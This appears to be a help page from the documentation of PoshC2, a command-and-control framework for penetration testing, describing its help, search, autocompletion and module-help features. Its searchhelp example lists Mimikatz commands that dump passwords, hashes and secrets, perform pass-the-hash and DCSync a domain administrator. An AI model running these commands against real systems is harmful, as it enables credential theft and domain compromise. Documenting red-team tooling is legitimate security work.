Help

PoshC2 has multiple maintained options for receiving help while using the tool.

In the Implant-Handler, the help command can always be run to provide a smart list of commands that are relevant to the current context. For example, in a PowerShell implant, only PowerShell relevant commands will be shown.

This help can be searched through the use of the searchhelp command:

PS 1> searchhelp mimikatz
searchhelp mimikatz
invoke-mimikatz -command '"sekurlsa::logonpasswords"'
invoke-mimikatz -command '"lsadump::sam"'
invoke-mimikatz -command '"lsadump::lsa"'
invoke-mimikatz -command '"lsadump::cache"'
invoke-mimikatz -command '"lsadump::secrets"'
invoke-mimikatz -command '"ts::multirdp"'
invoke-mimikatz -command '"privilege::debug"'
invoke-mimikatz -command '"crypto::capi"'
invoke-mimikatz -command '"crypto::certificates /export"'
invoke-mimikatz -command '"sekurlsa::pth /user:<user> /domain:<dom> /ntlm:<hash> /run:c:\temp\run.bat"'
invoke-mimikatz -command '"lsadump::dcsync /domain:domain.local /user:administrator"'

Auto-completion

Furthermore, each prompt has an intelligent context sensitive autocompletion menu:

These commands are fuzzy-matched with the current text (for the first word only), so for example isc will match invoke-shellcode and wmi will show all the commands with wmi in them.

../_images/autocompletions.png

Auto-suggestions

Each prompt maintains a contextual command history and provides auto-suggestions. For example, commands issued at a C# implant prompt will have their own history, and when at a C# prompt fish-shell-like suggestions will appear in gray text from that contextual history. These suggestions can be completed by pressing the right-arrow key or Ctrl-e.

../_images/autosuggestions.png

Module Help

For help on the individual modules in PoshC2, you can check the module source or run Get-Help for PowerShell modules once they have been loaded:

LoadModule Invoke-Mimikatz.ps1
Get-Help Invoke-Mimikatz

For C# and Python modules, if the module has help it can be loaded and run to display the help.

loadmodule MyHelpfulModule.exe
run-exe MyHelpfulModuleNamespace.MyHelpfulModuleClassName MyHelpfulModuleAssemblyName --help

Python Documentation

PoshC2 is also fully documented in python3 here. As PoshC2 is ever evolving and is always being updated with the latest tactics and techniques. To that end we recommend that users explore PoshC2’s source code to fully understand what is going on under the hood and how to tweak and adjust PoshC2 to match their needs and environment. For any help in doing this, see the Keep In Touch section below.

Keep In Touch

For all the latest news and features, or for the latest documentation and support check out the PoshC2 GitHub page or find us below:

Key Contributors